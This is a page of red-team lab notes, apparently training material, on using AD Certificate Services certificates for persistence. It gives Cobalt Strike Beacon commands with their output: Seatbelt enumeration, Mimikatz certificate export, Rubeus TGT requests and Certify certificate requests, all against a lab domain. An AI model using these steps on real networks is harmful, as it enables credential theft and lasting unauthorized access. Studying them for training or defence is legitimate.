What is this changing
Notes
NotesSome other stuff
test
Notes
NotesSome other stuff
  • Mixing...
  • General
    • Transferring Files
      • Serving Your Files
      • Transferring Files To Linux
      • Transferring Files To Windows
    • File Types
      • .vhd
    • Password Cracking
      • Hashcat
        • Wordlists
        • Wordlist + Rules
        • Masks
        • Mask Files
        • Combinator
        • Hybrid
        • Keyboard Walks
    • Trash to sift through
      • Cookie 3.1.24.ctd
  • OSINT
  • Enumeration
  • Web Applications
    • Web Vulnerabilities
      • Web App Red Team Checklist
      • SSRF (Server Side Request Forgery)
      • Blind Data Exfiltration via DNS
      • XSS
      • XXE
      • XPath Injection
    • APIs
      • Web API Indicators
      • Passive Reconnaissance
      • Active API Reconnaissance
  • Active Directory
    • Reconnaissance
      • PowerView
      • SharpView
      • ADSearch
    • User Impersonation
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • Token Impersonation
      • Token Store
      • Make Token
      • Process Injection
    • Lateral Movement
      • Windows Remote Management
      • PsExec
      • Windows Management Instrumentation (WMI)
      • CoInitializeSecurity
      • DCOM
    • Kerberos
      • Kerberoasting
      • ASREP Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • S4U2Self Abuse
      • Resource-Based Constrained Delegation
      • Shadow Credentials
      • Kerberos Relay Attacks
    • Pivoting
      • SOCKS Proxies
      • Linux Tools For Proxies
      • Windows Tools For Proxies
      • Pivoting with Kerberos
      • Pivoting A Browser
      • Reverse Port Forwards
      • NTLM Relaying
      • Relaying WebDAV
    • AD Certificate Services
      • Find Certificate Authorities
      • Misconfigured Certificate Templates
      • NTLM Relaying to ADCS HTTP Endpoints
      • User & Computer Persistence
    • Group Policy
      • Modify Existing GPO
      • Create & Link a GPO
    • MS SQL Servers
      • MS SQL Impersonation
      • MS SQL Command Execution
      • MS SQL Lateral Movement
      • MS SQL Privilege Escalation
    • Configuration Manager
      • Enumeration
      • Network Access Account Credentials
      • Lateral Movement
    • Domain Dominance
      • Silver Tickets
      • Golden Ticket
      • Diamond Tickets
      • Forged Certificates
    • Forest & Domain Trusts
      • Parent/Child
      • One-Way Inbound
      • One-Way Outbound
    • LAPS (Local Administrator Password Solution)
      • Reading ms-Mcs-AdmPwd
      • Password Expiration Protection
      • LAPS Backdoors
  • Report Writing
    • Wireless Pentesting
  • Cobalt Strike
    • Starting
      • Start CS as a Service
      • Listener Management
      • Generating Payloads
      • Pivot Listeners
    • Take Screenshot
    • Mimikatz
      • NTLM Hashes
      • Kerberos Encryption Keys
      • Security Account Manager
      • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
    • Session Passing
      • Beacon Passing
      • Foreign Listener
      • Spawn & Inject
    • Credentials
      • Credential Manager
      • Scheduled Task Credentials
    • Evading Windows Defender
      • Artifact Kit
      • Malleable C2
      • Resource Kit
      • AMSI vs Post-Exploitation
      • Manual AMSI Bypasses
      • Behavioural Detections
      • Parent/Child Relationships
      • Command Line Detections
    • Application Whitelisting
      • Policy Enumeration
      • Writeable Paths
      • Binaries, Scripts, and Libraries
      • PowerShell CLM
      • Beacon DLL
Powered by GitBook
On this page
Edit on GitHub

Last updated 7 days ago

Certificates can also be useful for maintaining persistent access to both users and computers, because they tend to have a longer shelf-life compared to passwords. For example, User certificates are valid for an entire year by default, regardless of password changes.

Certificates only become invalid if they're revoked by the CA (or expire). This also does not rely on any vulnerable templates. We can extract certificates that have already been issued, or just request new ones.

User Persistence

User certificates that have already been issued can be found in the user's Personal Certificate store.

If we have a Beacon running on their machine, we can enumerate their certificates with Seatbelt.

Always ensure the certificate is used for client authentication.

Certificates can be exported with Mimikatz using crypto::certificates (although it drops them to disk).

Go to View > Downloads to sync files from Cobalt Strike to your local machine.

Base64 encode the pfx file.

Then use it with Rubeus to obtain a TGT. The export password will be mimikatz.

OPSEC You may notice that this will request RC4 tickets by default. You can force the use of AES256 by including the /enctype:aes256 parameter.

If the user does not have a certificate in their store, we can just request one with Certify.

Computer Persistence

The same can be applied to computer accounts, but we must elevate to extract those certificates.

If requesting a machine certificate with Certify, the /machine parameter is required to auto-elevate to SYSTEM and assume the identity of the computer account. 

beacon> getuid
[*] You are DEV\nlamb

beacon> run hostname
wkstn-1

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates

  StoreLocation      : CurrentUser
  Issuer             : CN=sub-ca, DC=dev, DC=cyberbotic, DC=io
  Subject            : E=nlamb@cyberbotic.io, CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io
  ValidDate          : 9/7/2022 11:44:35 AM
  ExpiryDate         : 9/7/2023 11:44:35 AM
  HasPrivateKey      : True
  KeyExportable      : True
  Thumbprint         : 43FA3C3AE4E1212A3F888937745C2E2F55BAC1B5
  Template           : User
  EnhancedKeyUsages  :
       Encrypting File System
       Secure Email
       Client Authentication     [!] Certificate is used for client authentication!
beacon> mimikatz crypto::certificates /export

    Public export  : OK - 'CURRENT_USER_My_0_Nina Lamb.der'
    Private export : OK - 'CURRENT_USER_My_0_Nina Lamb.pfx'

beacon> download CURRENT_USER_My_0_Nina Lamb.pfx
[*] started download of C:\Users\nlamb\CURRENT_USER_My_0_Nina Lamb.pfx (3454 bytes)
[*] download of CURRENT_USER_My_0_Nina Lamb.pfx is complete
ubuntu@DESKTOP-3BSK7NO ~> cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /nowrap

[*] Using PKINIT with etype rc4_hmac and subject: E=nlamb@cyberbotic.io, CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIGQj[...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  nlamb
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/7/2022 12:28:51 PM
  EndTime                  :  9/7/2022 10:28:51 PM
  RenewTill                :  9/14/2022 12:28:51 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  Cptkd+BVLZ8+NS11BQQ6Zg==
  ASREP (key)              :  79C05DC0CC7909DF6448F1B24FAFBD71
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export

    Public export  : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.der'
    Private export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.pfx'
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap

[*] Action: Ask TGT

[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=wkstn-1.dev.cyberbotic.io 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\WKSTN-1$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIGYD[...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  WKSTN-1$
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/7/2022 12:06:02 PM
  EndTime                  :  9/7/2022 10:06:02 PM
  RenewTill                :  9/14/2022 12:06:02 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  6DV6vQB5lRoCz84qmRqt0X6UdIzzdQiX+y0IwwDrHlc=
  ASREP (key)              :  C1B715AF5F9B5468EB5FA8ADDA0E02EE2D7548F439DEA5A5D9B4F7DFA6482BDF
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine
PreviousNTLM Relaying to ADCS HTTP EndpointsNextGroup Policy
  1. Active Directory
  2. AD Certificate Services

User & Computer Persistence

CA Name             : dc-2.dev.cyberbotic.io\sub-ca
Template Name       : User
Schema Version      : 1
Validity Period     : 1 year